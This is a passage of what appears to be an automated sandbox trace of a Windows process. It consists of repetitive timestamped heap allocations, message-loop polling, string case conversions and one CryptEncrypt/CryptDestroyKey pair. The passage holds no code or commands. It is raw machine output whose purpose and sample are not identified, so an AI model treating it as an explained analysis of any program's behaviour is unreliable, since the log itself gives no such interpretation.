Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0206.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0206.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0206.322] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0206.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0206.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0206.323] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0206.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0206.324] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.324] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.324] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.324] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.324] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.325] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0206.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0206.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.325] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34f0ab8*, pdwDataLen=0x8bef68*=0x17426, dwBufLen=0x17428 | out: pbData=0x34f0ab8*, pdwDataLen=0x8bef68*=0x17428) returned 1 [0206.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0206.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0206.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0206.327] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0206.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01d0 [0206.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01e0 [0206.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0206.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0190 [0206.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01b0 [0206.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.327] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.327] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0206.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01d0 [0206.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0206.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0206.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0206.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0206.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0206.329] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0206.329] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.329] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0206.329] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.329] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0206.329] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0206.329] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.330] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0206.330] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.330] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.330] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.330] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0206.330] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.330] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.331] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.331] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.331] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.331] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.331] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.331] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.337] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.337] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.337] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.341] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0206.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.341] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0206.342] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0206.342] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.342] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0206.342] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.342] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0206.342] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.342] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0206.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0206.343] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.343] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0206.343] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0206.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0206.343] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0206.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.344] CryptDestroyKey (hKey=0xaa5760) returned 1 [0206.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.344] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0206.344] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0206.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0206.344] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0206.344] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.345] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0206.345] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.345] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0206.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0206.345] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0206.345] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 